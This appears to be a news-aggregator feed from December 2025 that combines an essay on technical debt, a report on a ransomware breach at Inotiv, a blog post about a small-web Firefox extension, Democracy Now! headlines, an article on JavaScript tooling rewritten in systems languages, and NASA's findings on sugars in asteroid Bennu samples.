I once worked at a company which had an enormous amount of technical debt - millions of lines of code, no unit tests, based on frameworks that were well over a decade out of date.  On one specific project, we had a market need to get some Windows-only modules running on Linux, and rather than cross-compiling, another team had simply copied & pasted a few hundred thousand lines of code, swapping Windows-specific components for Linux-specific.

For the non-technical reader, this is an enormous problem because now two versions of the code exist.  So, all features & bug fixes must be solved in two separate codebases that will grow apart over time.  When I heard about this, a young & naive version of me set out to fix the situation....

Tech debt projects are always a hard sell to management, because even if everything goes flawlessly, the code just does roughly what it did before. This project was no exception, and the optics weren't great.  I did as many engineers do and "ignored the politics", put my head down, and got it done.  But, the project went long, and I lost a lot of clout in the process.

I realized I was essentially trying to solve a people problem with a technical solution.  Most of the developers at this company were happy doing the same thing today that they did yesterday...and five years ago.  As Andrew Harmel-Law points out, code tends to follow the personalities of the people that wrote it.  The code was calcified because the developers were also.  Personality types who dislike change tend not to design their code with future change in mind.

Most technical problems are really people problems. Think about it.  Why does technical debt exist?  Because requirements weren't properly clarified before work began.  Because a salesperson promised an unrealistic deadline to a customer.  Because a developer chose an outdated technology because it was comfortable.  Because management was too reactive and cancelled a project mid-flight.  Because someone's ego wouldn't let them see a better way of doing things.

The core issue with the project was that admitting the need for refactoring was also to admit that the way the company was building software was broken and that individual skillsets were sorely out of date.  My small team was trying to fix one module of many, while other developers were writing code as they had been for decades.  I had one developer openly tell me, "I don't want to learn anything new."  I realized that you'll never clean up tech debt faster than others create it. It is like triage in an emergency room, you must stop the bleeding first , then you can fix whatever is broken.

An Ideal World

The project also disabused me of the engineer's ideal of a world in which engineering problems can be solved in a vacuum - staying out of "politics" and letting the work speak for itself - a world where deadlines don't exist...and let's be honest, neither do customers.  This ideal world rarely exists.  The vast majority of projects have non-technical stakeholders, and telling them "just trust me; we're working on it" doesn't cut it.  I realized that the perception that your team is getting a lot done is just as important as getting a lot done.

Non-technical people do not intuitively understand the level of effort required or the need for tech debt cleanup; it must be communicated effectively by engineering - in both initial estimates & project updates.  Unless leadership has an engineering background, the value of the technical debt work likely needs to be quantified and shown as business value.

Heads Up

Perhaps these are the lessons that prep one for more senior positions.  In my opinion, anyone above senior engineer level needs to know how to collaborate cross-functionally, regardless of whether they choose a technical or management track.  Schools teach Computer Science, not navigating personalities, egos, and personal blindspots.

I have worked with some incredible engineers, better than myself - the type that have deep technical knowledge on just about any technology you bring up.  When I was younger, I wanted to be that engineer - the "engineer's engineer".  But I realize now, that is not my personality.  I'm too ADD for that. :)

For all of their (considerable) strengths, more often than not, those engineers shy away from the interpersonal.  The tragedy is that they are incredibly productive ICs, but may fail with bigger initiatives because they are only one person - a single processor core can only go so fast.  Perhaps equally valuable is the "heads up coder" - the person who is deeply technical, but also able to pick their head up & see project risks coming (technical & otherwise) and steer the team around them.

Pharma firm Inotiv discloses data breach after ransomware attack

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 13:05:52
American pharmaceutical firm Inotiv is notifying thousands of people that they're personal information was stolen in an August 2025 ransomware attack. [...]...
Original Article

Inotiv

American pharmaceutical firm Inotiv is notifying thousands of people that they're personal information was stolen in an August 2025 ransomware attack.

Inotiv is an Indiana-based contract research organization specializing in drug development, discovery, and safety assessment, as well as live-animal research modeling. The company has about 2,000 employees and an annual revenue exceeding $500 million.

When it disclosed the incident, Inotiv said that the attack had disrupted business operations after some of its networks and systems (including databases and internal applications) were taken down.

Earlier this week, the company revealed in a filing with the U.S. Securities and Exchange Commission (SEC) that it has "restored availability and access" to impacted networks and systems and that it's now sending data breach notifications to 9,542 individuals whose data was stolen in the August ransomware attack.

"Our investigation determined that between approximately August 5-8, 2025, a threat actor gained unauthorized access to Inotiv's systems and may have acquired certain data," it says in letter samples filed with Maine's attorney general .

"Inotiv maintains certain data related to current and former employees of Inotiv and their family members, as well as certain data related to other individuals who have interacted with Inotiv or companies it has acquired."

Inotiv has not yet shared which types of data were stolen during the incident, nor has it attributed the attack to a specific cybercrime operation.

However, the Qilin ransomware group claimed responsibility for the breach in August, leaked data samples allegedly stolen from the company's compromised systems, and said they exfiltrated over 162,000 files totaling 176 GB.

Inotive entry on Qilin's leak site
Inotiv entry on Qilin's leak site (BleepingComputer) ​​​

​An Inotiv spokesperson has not yet responded to BleepingComputer's request for comment regarding the validity of Qilin ransomware's claims.

Qilin surfaced in August 2022 as a Ransomware-as-a-Service (RaaS) operation under the "Agenda" name and has since claimed responsibility for over 300 victims on its dark web leak site.

Qilin ransomware's list of victims includes high-profile organizations such as automotive giant Yangfeng , Australia's Court Services Victoria , publishing giant Lee Enterprises , and pathology services provider Synnovis .

The Synnovis incident affected several major NHS hospitals in London, forcing them to cancel hundreds of appointments and operations .

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Golang’s Big Miss on Memory Arenas

Lobsters
avittig.medium.com
2025-12-05 13:02:50
Comments...

Making RSS More Fun

Hacker News
matduggan.com
2025-12-05 13:00:28
Comments...
Original Article

I don't like RSS readers. I know, this is blasphemous especially on a website where I'm actively encouraging you to subscribe through RSS. As someone writing stuff, RSS is great for me. I don't have to think about it, the requests are pretty light weight, I don't need to think about your personal data or what client you are using. So as a protocol RSS is great, no notes.

However as something I'm going to consume, it's frankly a giant chore . I feel pressured by RSS readers, where there is this endlessly growing backlog of things I haven't read. I rarely want to read all of a websites content from beginning to end, instead I like to jump between them. I also don't really care if the content is chronological, like an old post about something interesting isn't less compelling to me than a newer post.

What I want, as a user experience, is something akin to TikTok. The whole appeal of TikTok, for those who haven't wasted hours of their lives on it, is that I get served content based on an algorithm that determines what I might think is useful or fun. However what I would like is to go through content from random small websites. I want to sit somewhere and passively consume random small creators content, then upvote some of that content and the service should show that more often to other users. That's it. No advertising, no collecting tons of user data about me, just a very simple "I have 15 minutes to kill before the next meeting, show me some random stuff."

In this case the "algorithm" is pretty simple: if more people like a thing, more people see it. But with Google on its way to replacing search results with LLM generated content, I just wanted to have something that let me play around with the small web the way that I used to.

There actually used to be a service like this called StumbleUpon which was more focused on pushing users towards popular sites. It has been taken down, presumably because there was no money in a browser plugin that sent users to other websites whose advertising you didn't control.

TL;DR

You can go download the Firefox extension now and try this out and skip the rest of this if you want. https://timewasterpro.xyz/ If you hate it or find problems, let me know on Mastodon. https://c.im/@matdevdug

Functionality

So I wanted to do something pretty basic. You hit a button, get served a new website. If you like the website, upvote it, otherwise downvote it. If you think it has objectionable content then hit report. You have to make an account (because I couldn't think of another way to do it) and then if you submit links and other people like it, you climb a Leaderboard.

On the backend I want to (very slowly so I don't cost anyone a bunch of money) crawl a bunch of RSS feeds, stick the pages in a database and then serve them up to users. Then I want to track what sites get upvotes and return those more often to other users so that "high quality" content shows up more often. "High quality" would be defined by the community or just me if I'm the only user.

It's pretty basic stuff, most of it copied from tutorials scattered around the Internet. However I really want to drive home to users that this is not a Serious Thing. I'm not a company, this isn't a new social media network, there are no plans to "grow" this concept beyond the original idea unless people smarter than me ping with me ideas. So I found this amazing CSS library: https://sakofchit.github.io/system.css/

The Apple's System OS design from the late-80s to the early 90s was one of my personal favorites and I think would send a strong signal to a user that this is not a professional, modern service.

Great, the basic layout works. Let's move on!

Backend

So I ended up doing FastAPI because it's very easy to write. I didn't want to spend a ton of time writing the API because I doubt I nailed the API design on the first round. I use sqlalchemy for the database. The basic API layout is as follows:

  • admin - mostly just generating read-only reports of like "how many websites are there"
  • leaderboard - So this is my first attempt at trying to get users involved. Submit a website that other people like? Get points, climb leaderboard.

The source for the RSS feeds came from the (very cool) Kagi small web Github. https://github.com/kagisearch/smallweb . Basically I assume that websites that have submitted their RSS feeds here are cool with me (very rarely) checking for new posts and adding them to my database. If you want the same thing as this does, but as an iFrame, that's the Kagi small web service.

The scraping work is straightforward. We make a background worker, they grab 5 feeds every 600 seconds, they check for new content on each feed and then wait until the 600 seconds has elapsed to grab 5 more from the smallweb list of RSS feeds. Since we have a lot of feeds, this ends up look like we're checking for new content less than once a day which is the interval that I want.

Then we write it out to a sqlite database and basically track "has this URL been reported", if so, put it into a review queue and then how many times this URL has been liked or disliked. I considered a "real" database but honestly sqlite is getting more and more scalable every day and its impossible to beat the immediate start up and functionality. Plus very easy to back up to encrypted object storage which is super nice for a hobby project where you might wipe the prod database at any moment.

In terms of user onboarding I ended up doing the "make an account with an email, I send a link to verify the email". I actually hate this flow and I don't really want to know a users email. I never need to contact you and there's not a lot associated with your account, which makes this especially silly. I have a ton of email addresses and no real "purpose" in having them. I'd switch to Login with Apple, which is great from a security perspective but not everybody has an Apple ID.

I also did a passkey version, which worked fine but the OSS passkey handling was pretty rough still and most people seem to be using a commercial service that handled the "do you have the passkey? Great, if not, fall back to email" flow. I don't really want to do a big commercial login service for a hobby application.

Auth is a JWT, which actually was a pain and I regret doing it. I don't know why I keep reaching for JWTs, they're a bad user experience and I should stop.

Can I just have the source code?

I'm more than happy to release the source code once I feel like the product is in a somewhat stable shape. I'm still ripping down and rewriting relatively large chunks of it as I find weird behavior I don't like or just decide to do things a different way.

In the end it does seem to do whats on the label. We have over 600,000 individual pages indexed.

So how is it to use?

Honestly I've been pretty pleased. But there are some problems.

First I couldn't find a reliable way of switching the keyboard shortcuts to be Mac/Windows specific. I found some options for querying platform but they didn't seem to work, so I ended up just hardcoding them as Alt which is not great.

The other issue is that when you are making an extension, you spend a long time working with these manifests.json. The specific part I really wasn't sure about was:

"browser_specific_settings": {
    "gecko": {
      "id": "[email protected]",
      "strict_min_version": "80.0",
      "data_collection_permissions": {
        "required": ["authenticationInfo"]
      }
    }
  }

I'm not entirely sure if that's all I'm doing? I think so from reading the docs.

Anyway I built this mostly for me. I have no idea if anybody else will enjoy it. But if you are bored I encourage you to give it a try. It should be pretty light weight and straight-forward if you crack open the extension and look at it. I'm not loading any analytics into the extension so basically until people complain about it, I don't really know if its going well or not.

Future stuff

  • I need to sort stuff into categories so that you get more stuff in genres you like. I don't 100% know how to do that, maybe there is a way to scan a website to determine the "types" of content that is on there with machine learning? I'm still looking into it.
  • There's a lot of junk in there. I think if we reach a certain number of downvotes I might put it into a special "queue".
  • I want to ensure new users see the "best stuff" early on but there isn't enough data to determine "best vs worst".
  • I wish there were more independent photography and science websites. Also more crafts. That's not really a "future thing", just me putting a hope out into the universe. Non-technical beta testers get overwhelmed by technical content.

Headlines for December 5, 2025

Democracy Now!
www.democracynow.org
2025-12-05 13:00:00
“One of the Most Troubling Things I’ve Seen”: Lawmakers React to U.S. “Double-Tap” Boat Strike, Pentagon Watchdog Finds Hegseth’s Use of Signal App “Created a Risk to Operational Security”, CNN Finds Israel Killed Palestinian Aid Seekers and Bulldozed ...
Original Article

Hi there,

In this age of widespread misinformation and increased threats to press freedom, support for independent journalism is more important than ever. Media is essential to the functioning of a democratic society. Please donate today, so we can keep delivering urgent reporting on the world’s most pressing issues.

Every dollar makes a difference

. Thank you so much!

Democracy Now!
Amy Goodman

Non-commercial news needs your support.

We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.

Please do your part today.

Donate

Independent Global News

Donate

Headlines December 05, 2025

Watch Headlines

“One of the Most Troubling Things I’ve Seen”: Lawmakers React to U.S. “Double-Tap” Boat Strike

Dec 05, 2025

The Pentagon has announced the U.S. blew up another boat in the eastern Pacific, killing four people. The Pentagon claimed the boat was carrying drugs but once again offered no proof. The U.S. has now killed at least 87 people in 22 strikes on boats since September. This comes as controversy continues to grow over a September 2 strike, when the U.S. targeted and killed two men who had survived an initial attack. Nine people were killed in the first strike. On Thursday, members of Congress were shown video of two men being killed at a time when they were clinging to the side of their overturned boat. Democratic Representative Jim Himes of Connecticut spoke after watching the video.

Rep. Jim Himes : “What I saw in that room was one of the most troubling things I’ve seen in my time in public service. You have two individuals in clear distress without any means of locomotion, with a destroyed vessel, who are killed by the United States.”

Lawmakers also questioned Admiral Frank “Mitch” Bradley, the operation’s commanding officer. Many questions remain over Defense Secretary Pete Hegseth’s role. The Washington Post recently reported Hegseth had ordered Pentagon officials to “kill everybody” on the boat.

Pentagon Watchdog Finds Hegseth’s Use of Signal App “Created a Risk to Operational Security”

Dec 05, 2025

The Pentagon’s inspector general has released its report examining Hegseth’s sharing of sensitive information about U.S. strikes in Yemen on a Signal group chat earlier this year. The report found Hegseth’s actions “created a risk to operational security that could have resulted in failed U.S. mission objectives and potential harm to U.S. pilots.” The report also criticized Hegseth’s use of a personal cellphone to conduct official business. Hegseth himself refused to cooperate with the investigation, refusing to hand over his phone or sit for an interview.

CNN Finds Israel Killed Palestinian Aid Seekers and Bulldozed Bodies into Shallow, Unmarked Graves

Dec 05, 2025

Israel’s military is continuing to pound the Gaza Strip in violation of the October 10 ceasefire agreement. Al Jazeera reports Israeli ships opened fire toward the coast of Khan Younis, while air raids struck the city of Rafah. There are reports of explosions and Israeli artillery fire around Gaza City, including airstrikes near the Maghazi refugee camp.

Meanwhile, a CNN investigation has found the Israeli military fired indiscriminately at starving Palestinians collecting sacks of flour near an aid distribution site near the Zikim crossing in June, then bulldozed their bodies into shallow, unmarked graves, with some bodies left to decompose or be partially eaten by dogs. Gaza officials and the United Nations estimate about 10,000 Palestinians remain missing from Israel’s more than two-year assault, while the official death toll recently passed 70,000.

Ireland, Slovenia, Spain and the Netherlands to Boycott Eurovision over Israel’s Participation

Dec 05, 2025

Image Credit: 'The Rising Star' Keshet 12

Public broadcasters in Ireland, Slovenia, the Netherlands and Spain said Thursday they will boycott the 2026 Eurovision Song Contest, after the European Broadcasting Union refused to hold a vote on whether to exclude Israel. This is José Pablo López, president of Spain’s national broadcaster.

José Pablo López : “We maintain the same position we had months ago when we said Israel’s participation in the Eurovision festival was untenable for two main reasons, firstly because the genocide it has perpetuated in Gaza. As president of the corporation, I keep thinking that Eurovision is a contest, but human rights are not a contest.”

Eurovision is among the most popular TV and online events in the world; last year, viewers from 156 countries cast votes for their favorite contestants.

Protesters Picket New Jersey Warehouse, Seeking to Block Arms Shipments to Israel

Dec 05, 2025

In New Jersey, protesters picketed this morning outside a Jersey City warehouse that is used to transport military cargo to Israel. A recent report by the Palestinian Youth Movement and Progressive International found the warehouse handles over 1,000 tons of Israel-bound military cargo every week, including thousands of MK-84 2,000-pound bombs that have been used to level Gaza.

Supreme Court Allows Texas to Use Racially Gerrymandered Congressional Map Favoring Republicans

Dec 05, 2025

The U.S. Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five seats next year. A lower court had previously ruled the redistricting plan was unconstitutional because it would likely dilute the political power of Black and Latino voters. Liberal Supreme Court Justice Elena Kagan wrote in her dissent, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution.”

FBI Arrests Suspect for Allegedly Planting Pipe Bombs on Capitol Hill Ahead of Jan. 6 Insurrection

Dec 05, 2025

The FBI has arrested a 30-year-old man from Virginia for allegedly planting pipe bombs near the Republican and Democratic National Committee headquarters in January 2021 — on the night before the January 6 insurrection at the U.S. Capitol. The suspect, Brian Cole, is expected to appear in court today.

DOJ Asks Judge to Rejail Jan. 6 Rioter Pardoned by Trump, After Threats to Rep. Jamie Raskin

Dec 05, 2025

The Justice Department has asked a judge to rejail a participant in the January 6 insurrection who had been pardoned by President Trump. The Justice Department made the request after the man, Taylor Taranto, showed up near the home of Democratic Congressmember Jamie Raskin, who served on the January 6 House Select Committee. Security has been increased for Raskin. In October, Taranto was sentenced to time served for making a threat near the home of former President Obama.

Grand Jury Refuses to Reindict Letitia James After Judge Throws Out First Indictment

Dec 05, 2025

A federal grand jury in Virginia has declined a second attempt by the Justice Department to indict New York Attorney General Letitia James on charges that she lied in her mortgage application. In a statement, Letitia James wrote, “As I have said from the start, the charges against me are baseless. It is time for this unchecked weaponization of our justice system to stop.” It’s the latest defeat to President Trump’s campaign of retribution against his political enemies. The Trump administration is reportedly considering a third attempt to obtain an indictment against James.

Protesters Ejected from New Orleans City Council Meeting After Demanding ” ICE -Free Zones”

Dec 05, 2025

Image Credit: New Orleans City Council

In New Orleans, about 30 activists were ejected from a City Council meeting Thursday after calling for ” ICE -free zones” and asking local leaders to do more to protect immigrants. During a public comment period, members of the public went to the microphone one by one and were cut off when it became clear they wanted to speak on immigration, which wasn’t on the formal agenda.

Brittany Cary: “And I’m asking City Council for ICE -free zones. Make all city-owned property ICE -free zones, and prohibit ICE and DHS from using city property to stage their operations. No collaboration with ICE . City Council must pass ordinances that codify noncollaboration” —

Chair : “Ma’am?”

Brittany Cary: — “between the city of New Orleans and ICE , including all of its offices and” —

Chair : “As I stated previously, that is not germane. Thank you for your comments.”

The protests came as the Border Patrol announced a surge of more than 200 federal immigration agents into New Orleans, which the agency is calling “Operation Catahoula Crunch.” They aim to make 5,000 arrests over two months. We’ll go to New Orleans later in the broadcast.

Honduran Presidential Candidate Nasralla Blames Trump’s Interference as Opponent Takes Lead

Dec 05, 2025

Honduran presidential candidate Salvador Nasralla has alleged fraud after his conservative rival Nasry Asfura regained the lead, as election officials continue to tally up votes from Sunday’s election. Nasralla also accused President Trump of interfering in the race by publicly backing Asfura. Some election officials have also publicly criticized the election process. On Thursday, Marlon Ochoa, who serves on Honduras’s National Electoral Council, decried what she called an electoral “coup.” She said, “I believe there is unanimity among the Honduran people that we are perhaps in the least transparent election in our democratic history.”

Trump Hosts Leaders of DRC and Rwanda in D.C. as U.S. Signs Bilateral Deals on Minerals

Dec 05, 2025

President Trump welcomed the leaders of the Democratic Republic of Congo and Rwanda to Washington, D.C., Thursday for the signing of an agreement aimed at ending decades of conflict in the eastern DRC . Trump also announced the U.S. had agreed to bilateral deals that will open the African nations’ reserves of rare earth elements and other minerals to U.S. companies. The signing ceremony was held in the newly renamed Donald J. Trump Institute of Peace.

Trump Struggles to Stay Awake in Another Public Event, Adding to Speculation over His Health

Dec 05, 2025

During Thursday’s event, Trump struggled to keep his eyes open. This follows other recent public appearances where Trump appeared to fall asleep at times. And once again, Trump was spotted wearing bandages on his right hand, which appeared bruised and swollen. That fueled further speculation about the president’s health. On Monday, the White House said the results from Trump’s recent MRI exam were “perfectly normal,” after Trump was unable to tell reporters aboard Air Force One what part of his body was scanned.

Reporter : “What part of your body was the MRI looking at?”

President Donald Trump : “I have no idea. It was just an MRI . What part of the body? It wasn’t the brain, because I took a cognitive test, and I aced it. I got a perfect mark, which you would be incapable of doing. Goodbye, everybody. You. too.”

Netflix Announces $72 Billion Deal to Buy Warner Bros. Discovery

Dec 05, 2025

In business news, Netflix has announced it will buy Warner Bros. in a deal worth at least $72 billion. The deal could reshape the entertainment and media industry, as it will give Netflix control of Warner’s movie and TV studios, as well as the HBO Max streaming service.

12 Arrested as Striking Starbucks Workers Hold Sit-In Protest at Empire State Building

Dec 05, 2025

Image Credit: X/@FightForAUnion

In labor news, a dozen striking Starbucks workers were arrested in New York City Thursday as they blocked the doors to the Empire State Building, where Starbucks has a corporate office. Starbucks workers at over 100 stores are on strike.

Judge Sentences California Animal Rights Activist to 90 Days in Jail for Freeing Abused Chickens

Dec 05, 2025

A University of California student has been ordered to serve 90 days in jail for breaking into a Sonoma County poultry slaughterhouse and freeing four chickens. Twenty-three-year-old Zoe Rosenberg of Berkeley received the sentence on Wednesday, after a jury convicted her in October of felony conspiracy and three misdemeanor counts. She was ordered to pay more than $100,000 to Petaluma Poultry, which is owned by the agribusiness giant Perdue Farms. Rosenberg’s supporters with the group Direct Action Everywhere say the chickens she rescued were worth $24; they’re reportedly alive and well at a sanctuary for rescued farm animals. Rosenberg told supporters her action was prompted by investigations that found routine violations of California’s animal cruelty laws at Petaluma Poultry slaughterhouses.

Zoe Rosenberg : “We found that there were dead birds among the living, that the air quality was so poor that chickens were struggling to breathe. I myself was struggling to breathe even with a KN95 mask as I investigated this facility. … And we have been calling on the California attorney general to take action, because the Sonoma County District Attorney’s Office has made it abundantly clear that they do not care about these animals whatsoever, that they care far more about the profits of Perdue, a company that makes over $10 billion a year on the backs of these animals.”

National Parks Service Prioritizes Free Entry on Trump’s Birthday Over Juneteenth and MLK Holidays

Dec 05, 2025

The Trump administration has ended a policy granting visitors free access to national parks on the Juneteenth and Martin Luther King Jr. Day holidays. Instead, the 116 parks that charge entrance fees will now waive admission charges on June 14 — President Trump’s birthday.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Non-commercial news needs your support

We rely on contributions from our viewers and listeners to do our work.
Please do your part today.

Make a donation

The Performance Revolution in JavaScript Tooling

Lobsters
blog.appsignal.com
2025-12-05 12:43:01
Comments...
Original Article

Over the last couple of years, we've witnessed a remarkable shift in the JavaScript ecosystem, as many popular developer tools have been rewritten in systems programming languages like Rust, Go, and Zig.

This transition has delivered dramatic performance improvements and other innovations that are reshaping how developers build JavaScript-backed applications.

In this article, we'll explore the driving forces behind this revolution, its implications for the wider ecosystem, and some of the most impactful projects leading the charge.

The shift toward building JavaScript tooling in systems languages is a response to real, mounting pressure in the ecosystem. While JavaScript engines have become remarkably fast over the years, the language itself wasn't designed for CPU-heavy workloads.

Modern JavaScript applications aren't just a few scripts anymore — they're sprawling codebases with thousands of dependencies, complex module graphs, and extensive build pipelines.

JavaScript-based tools that were once "good enough" now struggle to keep up, leading to sluggish build times, laggy editor experiences, and frustratingly slow feedback loops.

That's where languages like Rust and Go come in. They offer native performance, better memory management, and efficient concurrency — all of which translate into tooling that's not just faster, but more reliable and scalable.

Rust, in particular, with its seemingly cult-like following, has become the language of choice for much of this new wave. Its growing popularity has inspired a new generation of developers who care deeply about correctness, speed, and user experience. This has created a virtuous cycle where we get more tools and faster innovation.

All of this points to a broader realization in the JavaScript world: if we want tooling that scales with the demands of modern development, we have to look beyond JavaScript itself.

Let's look at some of the most influential and promising tools redefining the JavaScript developer experience: SWC, ESBuild, BiomeJS, Oxc, FNM/Volta, and TypeScript in Go.

1. SWC

SWC was among the first major JavaScript tools written in a language other than JavaScript itself (Rust), thus establishing a pattern that many others would follow.

At its core, it provides a high-performance platform for JavaScript/TypeScript transpilation, bundling, minification, and transformation through WebAssembly.

It has been largely successful in its goal of serving as a drop-in replacement for Babel, delivering transpilation speeds up to 20x faster while maintaining broad compatibility with most Babel configurations.

2. ESBuild

At a time when most developer tools were still being written in JavaScript, the idea of using systems languages like Go or Rust was considered more of an experiment than a trend.

But ESBuild changed that. In many ways, it sparked a broader wave of interest in building faster, lower-level tools that could dramatically improve the developer experience.

Created by Evan Wallace (former CTO of Figma), ESBuild was purpose-built to replace legacy bundlers like Webpack and Rollup with a much faster, simpler alternative. It achieves 10–100x faster performance in tasks like bundling, minification, and transpilation due to its Go-backed architecture.

Its speed, minimal configuration, and modern architecture have since influenced a generation of tools and helped shift the expectations around what JavaScript tooling should feel like, and for this reason, it remains the most adopted non-JavaScript tool to date, with over 50 million weekly downloads on NPM.

ESBuild weekly downloads on NPM

3. BiomeJS

BiomeJS is an ambitious Rust-based project that combines code formatting and linting into a single high-performance JavaScript toolchain.

Originally a fork of the now defunct Rome project , BiomeJS delivers significant performance improvements over its entrenched predecessors:

  • Its formatter is ~25 times faster than Prettier.
  • Its linter is over 15 times faster than ESLint.
  • It benefits from Rust's multi-threaded architecture for dramatic speed gains (up to ~100x faster depending on the hardware).

BiomeJS simplifies the development workflow by consolidating these functions into a unified configuration system, eliminating the need to manage separate tools with overlapping functionality.

Though it's still catching up to its more established counterparts in language support and extensibility, it is an increasingly attractive option for anyone seeking better performance and simpler tooling.

4. Oxc

A newer entrant to the field, Oxc is a collection of Rust-based JavaScript tools focusing on linting, formatting, and transforming JavaScript/TypeScript code.

It is part of the VoidZero project founded by Evan You (creator of Vue.js and Vite), and aims to be the backbone for the next-generation of JavaScript tooling.

Oxc's headline features include:

  • A JavaScript parser that's 3x faster than SWC.
  • A TypeScript/JSX transformer that's 20x to 50x faster than Babel.
  • An ESLint-compatible linter that runs significantly faster ( ~50-100x ).

oxlint has been a massive win for us at Shopify. Our previous linting setup took 75 minutes to run, so we were fanning it out across 40+ workers in CI. By comparison, oxlint takes around 10 seconds to lint the same codebase on a single worker, and the output is easier to interpret. We even caught a few bugs that were hidden or skipped by our old setup when we migrated!

Jason Miller , creator of Preact

5. FNM/Volta

Modern Node.js version management has greatly improved with tools like Fast Node Manager (fnm) and Volta , which are compelling alternatives to NVM . Another option is Mise , which supports Node.js along with many other development tools.

These Rust-based tools offer significantly faster shell initialization times and full cross-platform support with a much smaller memory footprint.

They address long-standing pain points in NVM, such as sluggish startup and lack of Windows compatibility, while adding conveniences like per-project version switching and seamless global package management.

6. TypeScript in Go

Perhaps the most surprising development in recent months is Microsoft's work on porting TypeScript's compiler to Go .

While it's still in active development, preliminary benchmarks already show remarkable improvements in build times (~10x for VS Code's codebase), editor startup speeds, and memory usage.

This native port addresses TypeScript's scaling challenges in large codebases, where developers previously had to compromise between snappy editor performance and rich type feedback.

While some viewed the choice of Go over Rust as a missed opportunity, given the latter's dominance in modern JavaScript tooling, the rationale behind this decision aligns well with the project's practical goals:

The existing code base makes certain assumptions -- specifically, it assumes that there is automatic garbage collection -- and that pretty much limited our choices. That heavily ruled out Rust. I mean, in Rust you have memory management, but it's not automatic; you can get reference counting or whatever you could, but then, in addition to that, there's the borrow checker and the rather stringent constraints it puts on you around ownership of data structures. In particular, it effectively outlaws cyclic data structures, and all of our data structures are heavily cyclic.

— Anders Hejlsberg, creator of TypeScript

Microsoft intends to ship the Go-based implementation as TypeScript 7.0 in the coming months, but native previews are already available for experimentation.

Beyond the clear performance gains, the rise of native tooling for JavaScript brings deeper, ecosystem-wide implications.

With many established and upcoming tools now relying on entirely different runtimes and ecosystems, contributing becomes less accessible to the majority of JavaScript developers.

At the same time, this shift may influence the skill sets that developers choose to pursue in the first place. While not everyone needs to write systems-level code, understanding how these languages work and what they make possible will drive even more innovative tooling in the coming years.

Unsurprisingly, although learning Rust or Zig presents a steeper barrier to entry, developers overwhelmingly prefer faster tools (even if they're harder to contribute to).

Screenshot of Twitter Poll

One other subtle, but important, tradeoff is the loss of dogfooding, where tool creators stop using their own language to build their tools: which has historically helped developers in tune with the experience they're shaping.

Moving to a different implementation language can weaken that feedback loop, and while many projects are aware of this risk, the long-term impact of a lack of dogfooding remains an open question.

The tools covered here represent just a slice of the growing ecosystem of performance-focused, native-powered developer tools, and the momentum behind this new wave is undeniable.

Other notable efforts in this space include Turbopack and Turborepo (from Vercel), Dprint (a Prettier alternative), and even full-fledged runtimes like Bun (written in Zig) and Deno (Rust), which reimagine what's possible by rebuilding JavaScript infrastructure from the ground up.

Together, these tools reflect a broader shift in the JavaScript world that makes it clear that the future of JavaScript tooling is being written in Rust, Go, Zig, and beyond.

Wrapping Up

In this post, we explored several tools driving a new wave of performance and innovation across the JavaScript ecosystem.

The performance revolution in JavaScript tooling is a fascinating case study in ecosystem evolution.

Instead of being constrained by the limitations of JavaScript itself, the community has pragmatically embraced other languages to push the boundaries of what's possible.

Netflix to Acquire Warner Bros

Hacker News
about.netflix.com
2025-12-05 12:21:19
Comments...
Original Article

403 ERROR


Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.

Generated by cloudfront (CloudFront)
Request ID: tSxqIFLwq-zGt0UwyLUOUN3IqzK_QOVkLmdXIVOTFHQKsoqQW7LIDA==

Sugars, Gum, Stardust Found in NASA's Asteroid Bennu Samples

Hacker News
www.nasa.gov
2025-12-05 12:12:52
Comments...
Original Article

The asteroid Bennu continues to provide new clues to scientists’ biggest questions about the formation of the early solar system and the origins of life. As part of the ongoing study of pristine samples delivered to Earth by NASA’s OSIRIS-REx (Origins, Spectral Interpretation, Resource Identification, and Security-Regolith Explorer) spacecraft, three new papers published Tuesday by the journals Nature Geosciences and Nature Astronomy present remarkable discoveries: sugars essential for biology, a gum-like substance not seen before in astromaterials, and an unexpectedly high abundance of dust produced by supernova explosions.

Sugars essential to life

Scientists led by Yoshihiro Furukawa of Tohoku University in Japan found sugars essential for biology on Earth in the Bennu samples, detailing their findings in the journal Nature Geoscience . The five-carbon sugar ribose and, for the first time in an extraterrestrial sample, six-carbon glucose were found. Although these sugars are not evidence of life, their detection, along with previous detections of amino acids, nucleobases, and carboxylic acids in Bennu samples, show building blocks of biological molecules were widespread throughout the solar system.

For life on Earth, the sugars deoxyribose and ribose are key building blocks of DNA and RNA, respectively. DNA is the primary carrier of genetic information in cells. RNA performs numerous functions, and life as we know it could not exist without it. Ribose in RNA is used in the molecule’s sugar-phosphate “backbone” that connects a string of information-carrying nucleobases.

“All five nucleobases used to construct both DNA and RNA, along with phosphates, have already been found in the Bennu samples brought to Earth by OSIRIS-REx,” said Furukawa. “The new discovery of ribose means that all of the components to form the molecule RNA are present in Bennu.”

The discovery of ribose in asteroid samples is not a complete surprise. Ribose has previously been found in two meteorites recovered on Earth. What is important about the Bennu samples is that researchers did not find deoxyribose. If Bennu is any indication, this means ribose may have been more common than deoxyribose in environments of the early solar system.

Researchers think the presence of ribose and lack of deoxyribose supports the “RNA world” hypothesis, where the first forms of life relied on RNA as the primary molecule to store information and to drive chemical reactions necessary for survival.

“Present day life is based on a complex system organized primarily by three types of functional biopolymers: DNA, RNA, and proteins,” explains Furukawa. “However, early life may have been simpler. RNA is the leading candidate for the first functional biopolymer because it can store genetic information and catalyze many biological reactions.”

The Bennu samples also contained one of the most common forms of “food” (or energy) used by life on Earth, the sugar glucose, which is the first evidence that an important energy source for life as we know it was also present in the early solar system.

Mysterious, ancient ‘gum’

